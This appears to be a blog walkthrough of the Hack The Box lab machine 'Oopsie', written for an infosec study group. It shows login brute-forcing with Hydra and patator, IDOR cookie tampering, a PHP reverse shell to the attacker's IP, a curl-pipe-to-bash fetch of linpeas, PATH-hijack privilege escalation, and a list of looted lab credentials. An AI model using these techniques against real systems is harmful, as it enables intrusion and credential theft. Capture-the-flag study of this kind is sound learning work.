Continuing the Intro boxes with my local infosec group the second box on the list is Oopsie. It’s listed as an Easy box, but for some people starting out that aren’t familiar with webapps they could get lost, especially figuring out the initial login foothold. It’s IP is 10.10.10.28 and you need the login pack for OpenVPN to reach it, you cant reach it with your normal one.
Recon
First we’re going to kick off a Nmap scan then checking the service versions and simple scripts on the found ports.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.28 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.28
We find TCP ports 22 and 80 open
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxxctowbmnTyFHK0XREQShvlp32DNZ7TS9fp1pTxwt4urebfFSitu4cF2dgTlCyVI6o+bxVLuWvhbKqUNpl/9BCv/1DFEDmbbygvwwcONVx5BtcpO/4ubylZXmzWkC6neyGaQjmzVJFMeRTTUsNkcMgpkTJXSpcuNZTknnQu/SSUC5ZUNPdzgNkHcobGhHNoaJC2StrcFwvcg2ftx6b+wEap6jWbLId8UfJk0OFCHZWZI/SubDzjx3030ZCacC1Sb61/p4Cz9MvLL5qPYcEm8A14uU9pTUfDvhin1KAEEDCSCS3bnvtlw1V7SyF/tqtzPNsmdqG2wKXUb6PLyllU/L
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLaHbfbieD7gNSibdzPXBW7/NO05J48DoR4Riz65jUkMsMhI+m3mHjowOPQISgaB8VmT/kUggapZt/iksoOn2Ig=
| 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLh0LONi0YmlZbqc960WnEcjI1XJTP8Li2KiUt5pmkk
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux
Since we see port 80 open we immediately try feroxbuster to look for some web-directories in another tab.
feroxbuster
feroxbuster --url http://10.10.10.28 --scan-limit 3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
We see a hit on http://10.10.10.28/cdn-cgi/login
so when we visit the page we see a HTTP Form
Nikto
Another tool that you can use for web scanning is Nikto which performs tests against web servers. As you can see below Nikto also found the /cdn-cgi/login/
directory.
Other tools
- GoBuster
gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e
- wfuzz
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.28/FUZZ=ls --hc 404
- ffuf
ffuf -u http://10.10.10.28/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc 200
- dirb and dirbuster are also some a good choice especially dirbuster if you are more comfortable with a GUI tool.
Also if we had BurpSuite running we could have saved time and seen a .js script called that would have given us a hint that the directory was there.
BurpSuite
Speaking of BurpSuite, you can attempt to bruteforce login pages using BurpSuite , but the community version timing is throttled to slower speeds which is a pain in the ass with huge wordlists. With Burp running you can send the request to Intruder, then in the Intruder->Position tab choose the password as the the target.
Paste in some passwords in the Intruder->Payloads tabs, go back to Positions and start the attack.
You should see successful results, for brevity we should be treating these boxes a a target company and reuse password from the previous box Archetype –MEGACORP_4dm1n!!
Hydra
So for simple HTTP Form POSTs another tool you can use is the mulitprotol cracking tool Hydra. which is included with Kali. We’re going to do the same process to figure out the syntax needed to crack the password. Without Burp available in Firefox you could open Devtools and check the network tab when attepting to login to see what kind request was sent so we can use it with Hydra.
Hydra has the ability to flag success or fail on error codes, nomally some weblogin forms give you feedback saying the user or password was bad so instead of the S=302
we’re could have used something like F=invalid
or something similar to whatever error showed , this login page does not show any errors, so we are going to use the 302 HTTP response code to flag as success since a valid login usually forwards you to the next page when logging in. The ^USER^
and ^PASS^
parameters will get from each line of the user and pasword file, since we can assume the userame is admin we’ll user the lowercase -l
is we had a userlist to cycle we could have used -L users.txt
. Since this is a simple HTTP Post form we’ll use the http-post-form
along with the url. Again for brevity we used the already known password form the last box. otherwise a good wordlist may be used, but in real-world scenarios you could face lockouts or CAPTCHAs when trying to bruteforce logins and might trigger alerts to the webadmin that someones trying to bruteforce.
hydra -l admin -P passwords.txt 10.10.10.28 http-post-form "/cdn-cgi/login/index.php?:username=^USER^&password=^PASS^:S=302"
patator
Patator is a multi-protocol cracker also, we can do a similar crack and then filter out the 200 HTTP code so we just see the 302 redirect as a valid login
patator http_fuzz url=http://10.10.10.28/cdn-cgi/login/index.php method=POST body='username=admin&password=FILE0' 0=passwords.txt -x ignore:code=200
Super admin
So now that we are logged in and we look around the links inside the panel, we notice the uploads page needs super admin rights. When online users normally log in there is a cookie or a user ID usually associated with your session. So, when we log into whoopsie and go to the uploads page , in the URL bar we see that our user ID=1. We want to try to switch out the number with a different number to see if we can get associated with a different account ID that may give us different privileges. Since Burp does well with adjusting and attacking parameter we are going to send this request to Intruder again.
In Burp you can set a sequential number payload to iterate from 1-50, so let’s try that and start the attack
We can see from the results that the number 30 has a different size then most of the responses
Let’s try to mimic this with wfuzz, In bash lets create a file with the 1 through 50 in it printf '%s\n' {1..50} >numbers.txt
to use for a wordlist but no need, wfuzz includes a simple number iterator too , we just need to supply the URL and the cookie of our admin user
wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
as you see theres alot of the same length responses 3595
so lets filter those using --hh 3595
wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' --hh 3595 "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
That gives us less results to go through, we can then test each with curl and grep for super, you see there is an ID in the returned html, lets go in Firefox DevTools and change our user id number to 86575
and refresh the page. When we go to the uploads link you will see we now have privileges to upload, so lets go ahead and upload a simple php reverse shell.
curl -s --cookie-jar cookies.txt -H $'Cookie: user=34322; role=admin' 'http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=30' |grep super
Put this in a file and name it rev.php (use ifconfig tun0
to get yoru HTB VPN IP)
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.93/9001 0>&1'");
open a netcat listener on port 9000
nc -lvnp 9000
When we upload our file we dont get any feedback where the file may be stores ,luckily in prior recon we saw the /uploads
directory, so lets try navigating to http://10.10.10.28/uploads/rev.php, lucky for us or guess paid off, sometimes its difficult toi know the upload directory and sometimes even the filename gets randomized or hashed.
So now that we have our shell let’s upgrade to a better TTY shell using using python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
looking around in the www directory we find a db.php file which hold some credentials 🙂 Let’s hope robert is lazy and reuses his password for SSH
USER
We find that these are indeed robert’s SSH credentials also, so we grab the user.txt
Then we do some recon using linpeas to get some situational awareness. Let’s start a python http server to host our linpeas and wget it. From attack box:
https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh & sudo python3 -m http.server 80
From victim:
curl http://10.10.15.93/linpeas.sh | bash
We dont find much useful information , although if you werent paying attention you might not have noticed the bugtracker
group robert is in. so let’s figure out what he can do as a group member.
We see that robert can execute a binary in the bin folder called bugtracker. When we execute it , it asks for a number i tried a few then tried 1
and it finally return some data. We run strings on the file to see if we can get any hints to what it’s doing strings /usr/bin/bugtracker
We see that it’s just using cat
to get the contents of a file in the /root/report directory. Since its not using a full absolute path to cat i.e. /bin/cat
we can try to create an evil cat
in our working directory. When calling the bugtracker program it’ll look in our current folder first
export PATH=~:$PATH
echo '/bin/bash' > cat
chmod +x cat
ROOT
Well looks like we dont have a root.txt yet :/ So starting with more recon lets check out the /root folder
so looking at the file I noticed it looked like it had contents, so figured I could use xxd to get the hex output of the file , and I found the flag :). then i figured out my aha moment when I wasnt using the full path for cat either…
but… looking further in the root directory, we find a .config folder that has a fillezilla.xml config, we see more credentials , much like the last box, we’re probably going to use these credentials on the next box…
LOOT
- admin: MEGACORP_4dm1n!!
- robert:M3g4C0rpUs3r!
- ftpuser:mc@F1l3ZilL4